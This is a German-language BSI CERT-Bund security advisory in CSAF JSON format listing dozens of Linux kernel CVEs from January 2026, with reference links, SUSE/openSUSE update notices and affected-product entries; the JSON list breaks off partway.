Action not permitted
Modal body text goes here.
Modal Title
Modal Body
WID-SEC-W-2026-0086
Vulnerability from csaf_certbund - Published: 2026-01-13 23:00 - Updated: 2026-02-04 23:00Summary
Linux Kernel: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Der Kernel stellt den Kern des Linux Betriebssystems dar.
Angriff
Ein Angreifer kann mehrere Schwachstellen im Linux Kernel ausnutzen um nicht näher spezifizierte Angriffe durchzuführen, die möglicherweise zu einer Denial-of-Service- Bedingung führen oder eine Speicherbeschädigung verursachen können.
Betroffene Betriebssysteme
- Linux
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Der Kernel stellt den Kern des Linux Betriebssystems dar.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen im Linux Kernel ausnutzen um nicht n\u00e4her spezifizierte Angriffe durchzuf\u00fchren, die m\u00f6glicherweise zu einer Denial-of-Service- Bedingung f\u00fchren oder eine Speicherbesch\u00e4digung verursachen k\u00f6nnen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2026-0086 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0086.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-0086 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0086"
},
{
"category": "external",
"summary": "Kernel CVE Announce Mailingliste",
"url": "https://lore.kernel.org/linux-cve-announce/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68767",
"url": "https://lore.kernel.org/linux-cve-announce/2026011353-CVE-2025-68767-cd16@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68768",
"url": "https://lore.kernel.org/linux-cve-announce/2026011356-CVE-2025-68768-d458@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68769",
"url": "https://lore.kernel.org/linux-cve-announce/2026011357-CVE-2025-68769-e471@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68770",
"url": "https://lore.kernel.org/linux-cve-announce/2026011357-CVE-2025-68770-6464@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68771",
"url": "https://lore.kernel.org/linux-cve-announce/2026011357-CVE-2025-68771-cf0d@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68772",
"url": "https://lore.kernel.org/linux-cve-announce/2026011358-CVE-2025-68772-9d70@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68773",
"url": "https://lore.kernel.org/linux-cve-announce/2026011358-CVE-2025-68773-bd5d@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68774",
"url": "https://lore.kernel.org/linux-cve-announce/2026011358-CVE-2025-68774-f2fd@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68775",
"url": "https://lore.kernel.org/linux-cve-announce/2026011359-CVE-2025-68775-6e68@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68776",
"url": "https://lore.kernel.org/linux-cve-announce/2026011359-CVE-2025-68776-5aed@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68777",
"url": "https://lore.kernel.org/linux-cve-announce/2026011359-CVE-2025-68777-2073@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68778",
"url": "https://lore.kernel.org/linux-cve-announce/2026011300-CVE-2025-68778-c392@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68779",
"url": "https://lore.kernel.org/linux-cve-announce/2026011300-CVE-2025-68779-726e@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68780",
"url": "https://lore.kernel.org/linux-cve-announce/2026011300-CVE-2025-68780-f5c8@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68781",
"url": "https://lore.kernel.org/linux-cve-announce/2026011301-CVE-2025-68781-f30f@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68782",
"url": "https://lore.kernel.org/linux-cve-announce/2026011301-CVE-2025-68782-a72f@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68783",
"url": "https://lore.kernel.org/linux-cve-announce/2026011302-CVE-2025-68783-e807@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68784",
"url": "https://lore.kernel.org/linux-cve-announce/2026011302-CVE-2025-68784-b1e0@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68785",
"url": "https://lore.kernel.org/linux-cve-announce/2026011302-CVE-2025-68785-c96c@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68786",
"url": "https://lore.kernel.org/linux-cve-announce/2026011303-CVE-2025-68786-d145@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68787",
"url": "https://lore.kernel.org/linux-cve-announce/2026011303-CVE-2025-68787-af6d@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68788",
"url": "https://lore.kernel.org/linux-cve-announce/2026011303-CVE-2025-68788-05bd@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68789",
"url": "https://lore.kernel.org/linux-cve-announce/2026011304-CVE-2025-68789-cca8@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68790",
"url": "https://lore.kernel.org/linux-cve-announce/2026011304-CVE-2025-68790-6166@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68791",
"url": "https://lore.kernel.org/linux-cve-announce/2026011304-CVE-2025-68791-e739@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68792",
"url": "https://lore.kernel.org/linux-cve-announce/2026011305-CVE-2025-68792-9a3f@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68793",
"url": "https://lore.kernel.org/linux-cve-announce/2026011305-CVE-2025-68793-bb5f@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68794",
"url": "https://lore.kernel.org/linux-cve-announce/2026011305-CVE-2025-68794-32db@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68795",
"url": "https://lore.kernel.org/linux-cve-announce/2026011306-CVE-2025-68795-4e3e@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68796",
"url": "https://lore.kernel.org/linux-cve-announce/2026011306-CVE-2025-68796-9eee@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68797",
"url": "https://lore.kernel.org/linux-cve-announce/2026011306-CVE-2025-68797-b45e@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68798",
"url": "https://lore.kernel.org/linux-cve-announce/2026011307-CVE-2025-68798-ea9c@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68799",
"url": "https://lore.kernel.org/linux-cve-announce/2026011307-CVE-2025-68799-b0dd@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68800",
"url": "https://lore.kernel.org/linux-cve-announce/2026011307-CVE-2025-68800-39d2@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68801",
"url": "https://lore.kernel.org/linux-cve-announce/2026011308-CVE-2025-68801-d3d5@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68802",
"url": "https://lore.kernel.org/linux-cve-announce/2026011308-CVE-2025-68802-a7f9@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68803",
"url": "https://lore.kernel.org/linux-cve-announce/2026011309-CVE-2025-68803-d897@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68804",
"url": "https://lore.kernel.org/linux-cve-announce/2026011309-CVE-2025-68804-f10e@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68805",
"url": "https://lore.kernel.org/linux-cve-announce/2026011309-CVE-2025-68805-3284@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68806",
"url": "https://lore.kernel.org/linux-cve-announce/2026011310-CVE-2025-68806-a2fb@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68807",
"url": "https://lore.kernel.org/linux-cve-announce/2026011310-CVE-2025-68807-0fd6@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68808",
"url": "https://lore.kernel.org/linux-cve-announce/2026011310-CVE-2025-68808-4cb9@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68809",
"url": "https://lore.kernel.org/linux-cve-announce/2026011311-CVE-2025-68809-e875@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68810",
"url": "https://lore.kernel.org/linux-cve-announce/2026011311-CVE-2025-68810-308a@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68811",
"url": "https://lore.kernel.org/linux-cve-announce/2026011311-CVE-2025-68811-7e46@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68812",
"url": "https://lore.kernel.org/linux-cve-announce/2026011312-CVE-2025-68812-4098@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68813",
"url": "https://lore.kernel.org/linux-cve-announce/2026011312-CVE-2025-68813-13a5@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68814",
"url": "https://lore.kernel.org/linux-cve-announce/2026011312-CVE-2025-68814-146a@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68815",
"url": "https://lore.kernel.org/linux-cve-announce/2026011313-CVE-2025-68815-2112@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68816",
"url": "https://lore.kernel.org/linux-cve-announce/2026011313-CVE-2025-68816-e773@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68817",
"url": "https://lore.kernel.org/linux-cve-announce/2026011313-CVE-2025-68817-03ab@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68818",
"url": "https://lore.kernel.org/linux-cve-announce/2026011314-CVE-2025-68818-08ea@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68819",
"url": "https://lore.kernel.org/linux-cve-announce/2026011314-CVE-2025-68819-64a3@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68820",
"url": "https://lore.kernel.org/linux-cve-announce/2026011315-CVE-2025-68820-7a4f@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68821",
"url": "https://lore.kernel.org/linux-cve-announce/2026011315-CVE-2025-68821-b515@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68822",
"url": "https://lore.kernel.org/linux-cve-announce/2026011315-CVE-2025-68822-a75d@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68823",
"url": "https://lore.kernel.org/linux-cve-announce/2026011316-CVE-2025-68823-8bf1@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71064",
"url": "https://lore.kernel.org/linux-cve-announce/2026011322-CVE-2025-71064-94ea@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71065",
"url": "https://lore.kernel.org/linux-cve-announce/2026011322-CVE-2025-71065-6818@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71066",
"url": "https://lore.kernel.org/linux-cve-announce/2026011323-CVE-2025-71066-f1fa@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71067",
"url": "https://lore.kernel.org/linux-cve-announce/2026011323-CVE-2025-71067-9c81@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71068",
"url": "https://lore.kernel.org/linux-cve-announce/2026011323-CVE-2025-71068-f1a9@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71069",
"url": "https://lore.kernel.org/linux-cve-announce/2026011324-CVE-2025-71069-33d4@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71070",
"url": "https://lore.kernel.org/linux-cve-announce/2026011324-CVE-2025-71070-b6c2@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71071",
"url": "https://lore.kernel.org/linux-cve-announce/2026011325-CVE-2025-71071-67e9@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71072",
"url": "https://lore.kernel.org/linux-cve-announce/2026011325-CVE-2025-71072-b52b@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71073",
"url": "https://lore.kernel.org/linux-cve-announce/2026011325-CVE-2025-71073-b002@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71074",
"url": "https://lore.kernel.org/linux-cve-announce/2026011326-CVE-2025-71074-f3ed@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71075",
"url": "https://lore.kernel.org/linux-cve-announce/2026011326-CVE-2025-71075-c85d@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71076",
"url": "https://lore.kernel.org/linux-cve-announce/2026011326-CVE-2025-71076-19ff@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71077",
"url": "https://lore.kernel.org/linux-cve-announce/2026011327-CVE-2025-71077-6e08@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71078",
"url": "https://lore.kernel.org/linux-cve-announce/2026011337-CVE-2025-71078-9a51@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71079",
"url": "https://lore.kernel.org/linux-cve-announce/2026011338-CVE-2025-71079-9f24@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71080",
"url": "https://lore.kernel.org/linux-cve-announce/2026011338-CVE-2025-71080-f9ae@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71081",
"url": "https://lore.kernel.org/linux-cve-announce/2026011338-CVE-2025-71081-df43@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71082",
"url": "https://lore.kernel.org/linux-cve-announce/2026011339-CVE-2025-71082-ef8a@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71083",
"url": "https://lore.kernel.org/linux-cve-announce/2026011339-CVE-2025-71083-ddb3@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71084",
"url": "https://lore.kernel.org/linux-cve-announce/2026011339-CVE-2025-71084-52a2@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71085",
"url": "https://lore.kernel.org/linux-cve-announce/2026011340-CVE-2025-71085-e6c1@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71086",
"url": "https://lore.kernel.org/linux-cve-announce/2026011340-CVE-2025-71086-18be@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71087",
"url": "https://lore.kernel.org/linux-cve-announce/2026011340-CVE-2025-71087-53c4@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71088",
"url": "https://lore.kernel.org/linux-cve-announce/2026011341-CVE-2025-71088-9436@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71089",
"url": "https://lore.kernel.org/linux-cve-announce/2026011341-CVE-2025-71089-a642@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71090",
"url": "https://lore.kernel.org/linux-cve-announce/2026011341-CVE-2025-71090-6e3a@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71091",
"url": "https://lore.kernel.org/linux-cve-announce/2026011342-CVE-2025-71091-860d@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71092",
"url": "https://lore.kernel.org/linux-cve-announce/2026011342-CVE-2025-71092-9f73@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71093",
"url": "https://lore.kernel.org/linux-cve-announce/2026011343-CVE-2025-71093-387f@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71094",
"url": "https://lore.kernel.org/linux-cve-announce/2026011343-CVE-2025-71094-087b@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71095",
"url": "https://lore.kernel.org/linux-cve-announce/2026011343-CVE-2025-71095-6fad@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71096",
"url": "https://lore.kernel.org/linux-cve-announce/2026011344-CVE-2025-71096-fb73@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71097",
"url": "https://lore.kernel.org/linux-cve-announce/2026011344-CVE-2025-71097-7cfc@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71098",
"url": "https://lore.kernel.org/linux-cve-announce/2026011344-CVE-2025-71098-ef6d@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71099",
"url": "https://lore.kernel.org/linux-cve-announce/2026011345-CVE-2025-71099-b6f8@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71100",
"url": "https://lore.kernel.org/linux-cve-announce/2026011345-CVE-2025-71100-537f@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71101",
"url": "https://lore.kernel.org/linux-cve-announce/2026011345-CVE-2025-71101-1886@gregkh/"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0350-1 vom 2026-01-30",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-January/024000.html"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2026:20145-1 vom 2026-02-03",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/FIKVKDA42VXBWDNHA6WP345IDVA2E3XU/"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0369-1 vom 2026-02-03",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024037.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20207-1 vom 2026-02-04",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024052.html"
}
],
"source_lang": "en-US",
"title": "Linux Kernel: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2026-02-04T23:00:00.000+00:00",
"generator": {
"date": "2026-02-05T09:40:46.600+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.5.0"
}
},
"id": "WID-SEC-W-2026-0086",
"initial_release_date": "2026-01-13T23:00:00.000+00:00",
"revision_history": [
{
"date": "2026-01-13T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2026-02-01T23:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2026-02-03T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von openSUSE und SUSE aufgenommen"
},
{
"date": "2026-02-04T23:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von SUSE aufgenommen"
}
],
"status": "final",
"version": "4"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Open Source Linux Kernel",
"product": {
"name": "Open Source Linux Kernel",
"product_id": "T049905",
"product_identification_helper": {
"cpe": "cpe:/o:linux:linux_kernel:-"
}
}
}
],
"category": "vendor",
"name": "Open Source"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
},
{
"category": "product_name",
"name": "SUSE openSUSE",
"product": {
"name": "SUSE openSUSE",
"product_id": "T027843",
"product_identification_helper": {
"cpe": "cpe:/o:suse:opensuse:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-68767",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68767"
},
{
"cve": "CVE-2025-68768",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68768"
},
{
"cve": "CVE-2025-68769",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68769"
},
{
"cve": "CVE-2025-68770",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68770"
},
{
"cve": "CVE-2025-68771",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68771"
},
{
"cve": "CVE-2025-68772",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68772"
},
{
"cve": "CVE-2025-68773",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68773"
},
{
"cve": "CVE-2025-68774",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68774"
},
{
"cve": "CVE-2025-68775",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68775"
},
{
"cve": "CVE-2025-68776",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68776"
},
{
"cve": "CVE-2025-68777",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68777"
},
{
"cve": "CVE-2025-68778",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68778"
},
{
"cve": "CVE-2025-68779",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68779"
},
{
"cve": "CVE-2025-68780",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68780"
},
{
"cve": "CVE-2025-68781",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68781"
},
{
"cve": "CVE-2025-68782",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68782"
},
{
"cve": "CVE-2025-68783",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68783"
},
{
"cve": "CVE-2025-68784",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68784"
},
{
"cve": "CVE-2025-68785",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68785"
},
{
"cve": "CVE-2025-68786",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68786"
},
{
"cve": "CVE-2025-68787",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68787"
},
{
"cve": "CVE-2025-68788",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68788"
},
{
"cve": "CVE-2025-68789",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68789"
},
{
"cve": "CVE-2025-68790",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68790"
},
{
"cve": "CVE-2025-68791",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68791"
},
{
"cve": "CVE-2025-68792",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68792"
},
{
"cve": "CVE-2025-68793",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68793"
},
{
"cve": "CVE-2025-68794",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68794"
},
{
"cve": "CVE-2025-68795",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68795"
},
{
"cve": "CVE-2025-68796",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68796"
},
{
"cve": "CVE-2025-68797",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68797"
},
{
"cve": "CVE-2025-68798",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68798"
},
{
"cve": "CVE-2025-68799",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68799"
},
{
"cve": "CVE-2025-68800",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68800"
},
{
"cve": "CVE-2025-68801",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68801"
},
{
"cve": "CVE-2025-68802",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68802"
},
{
"cve": "CVE-2025-68803",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68803"
},
{
"cve": "CVE-2025-68804",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68804"
},
{
"cve": "CVE-2025-68805",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
